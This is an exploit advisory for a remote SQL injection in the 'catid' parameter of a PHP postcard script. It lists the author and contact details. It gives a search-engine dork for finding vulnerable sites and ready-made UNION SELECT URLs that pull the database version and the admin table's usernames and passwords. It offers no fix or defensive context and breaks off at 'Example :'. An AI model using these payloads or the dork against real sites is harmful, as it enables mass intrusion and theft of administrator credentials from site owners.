post Card ( catid ) Remote SQL Injection Vulnerability ___________________________________ Author: Hussin X Home : www.iqs3cur1ty.com & www.iq-ty.com MaiL : darkangeL_G85@Yahoo.CoM ___________________________________ script : http://webbdomain.com/php/postcarden/index2.php script : http://webbdomain.com/php/postcardir/index2.php version : all DorK : inurl:choosecard.php?catid= _____ ExploiT & Demo _______ version : http://webbdomain.com/php/postcardir/choosecard.php?catid=-1+uniOn+select+version%28%29,555555555555,6666666666666666666+from+admin-- user & pass : http://webbdomain.com/php/postcardir/choosecard.php?catid=-1+uniOn+select+concat%28username,0x3a,password%29,555555555555,6666666666666666666+from+admin-- Note : Exploit in Source page Example :